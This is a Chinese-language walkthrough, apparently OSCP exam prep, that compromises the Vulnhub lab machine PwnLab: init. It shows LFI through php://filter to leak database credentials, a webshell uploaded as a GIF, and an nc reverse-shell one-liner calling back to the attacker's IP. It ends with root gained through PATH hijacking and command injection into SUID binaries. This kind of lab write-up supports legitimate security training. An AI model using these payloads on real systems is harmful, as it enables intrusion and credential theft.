OSCP备考_0x08_Vulnhub靶机_PwnLab: init

Ethan医生3个月前靶场120
名称说明
靶机下载链接https://www.vulnhub.com/entry/pwnlab-init,158/
攻击机(kali)ip:192.168.233.168
靶机(CentOS)ip:192.168.233.175

信息收集


arp-scan 192.168.233.1/24  

image.png

nmap -p- -sV -O -A 192.168.233.175, 查看使用有port 80,111,3306,58592

image.png


192.168.233.175 , 有个upload应该是上传文件漏洞,需要先登入

image.png

账号密码不知道 先测试看看爆破目录

gobuster dir -u http://192.168.233.175 -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt  

发现到有两个目录文件/images , /upload


image.png

添加个文件扩展看看 -x php,html





应该是有地方可以上传

image.png

http://192.168.233.175/?page=login ,http://192.168.233.175/?page=upload 发现点击页面的时后page后面参数可变

image.png

image.png

 发现page=index,网页挂了,证明page=后面的参数可控,试试php伪协议是否可用

image.png

file协议:

用法:

file:/ 跟要访问的文件

php://filter/read=convert.base64-encode/resource=login

image.png

image.png

将PD9wa下面的数据取出 进行base64解密

echo "base64==" | base64 -d

image.png

发现到有require这个config.php尝试获取看看

果然返回了, 一样进行base64解密,出现了数据库的账号密码

image.png

测试连接3306端口,发现账号密码 测试看看能不能登入网页

image.png

拿到账号密码,解密

kent/JWzXuBJJNy

mike/SIfdsTEn6I

kane/iSv5Ym2GRo


登录web,尝试上传一句话木马,登入后开始尝试图破先看upload限制了白名单

image.png

那只能依照他的格式上传一个带有后门的挡案,上传后查看有没有图破口,忽然想到有index这时候看看他的源代码有没有可利用点


http://192.168.233.175/?page=php://filter/read=convert.base64-encode/resource=index , 有 include文件 那上传的挡案就可以使用了

image.png

这边上传哥斯拉的木马上去 upload/7a68f219a5fc219beb832ab642246933.gif

访问看看,拿下webshell

image.png

image.png

获取到ww-data用户 开始操作提权

image.png


这里使用手动上传一句话木马

image.png

image.png


ethan=system('nc 192.168.233.168 3333 -e /bin/bash'); 改成NC反弹SHELL

登入后枚举下用户 etc/passwd

image.png

尝试使用获取到的账号密码进行登入

其中kane和kent用户可以登录,在kane用户下发现了一个具有sid权限的文件,文件拥有者为mike用户


1608925275_5fe6405b1e7b12ea1f988.png!small?1608925274710

Strings 看一下文件内容

image.png

为啥要看 msgmike 因为使用命令suid的时后发现有权限给到这文件 然后文件内调用了cat挡案, 那可以将cat替换成环境变量 让系统去执行 然而执行的时后达到root权限

image.png

设置到tmp目录

echo /bin/bash > cat

image.png

env看下环境变量

image.png


然后插入环境变量

export PATH=/tmp:$PATH

image.png

就可以开始进行操作那msgmike, 有个重点要给cat执行权限噢

可恶又被套娃了 需要到mike底下去操作看看

image.png

已经到了mike底下

image.png

跟刚刚一样发现底下有msg2root,strings查看有啥可以使用的

image.png

输入;/bin/sh , /bin/echo ;/bin/sh >> /root/messages.txt 细节需要自己品...

image.png

然后当然就是到root底下拿flag.txt

image.png

标签: OSCP

相关文章

OSCP备考_0x57_HackThBox靶机_Windows_Love

OSCP备考_0x57_HackThBox靶机_Windows_Love

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.48.103 (扫描TCP)绑定域名 http://10.129.48.103...

OSCP备考_0x12_Vulnhub靶机_Lampião: 1

OSCP备考_0x12_Vulnhub靶机_Lampião: 1

名称说明靶机下载链接https://www.vulnhub.com/entry/lampiao-1,249/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.16...

OSCP备考_0x20_HackThBox靶机_Linux_Blocky

OSCP备考_0x20_HackThBox靶机_Linux_Blocky

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.14.190 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x53_HackThBox靶机_Windows_Active(AD域)

OSCP备考_0x53_HackThBox靶机_Windows_Active(AD域)

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.237.97 (扫描TCP)enum4linux(自动化枚举)   ...

OSCP备考_0x17_Vulnhub靶机_joy

OSCP备考_0x17_Vulnhub靶机_joy

名称说明靶机下载链接攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.168.233.184arp-scan 192.168.233.1/24nmap -p- 1...

OSCP备考_0x03_HackThBox靶机_Linux_nibbles

OSCP备考_0x03_HackThBox靶机_Linux_nibbles

信息收集nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.193.19 (扫描TCP)nmap -sU --top-ports 100 10.129...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。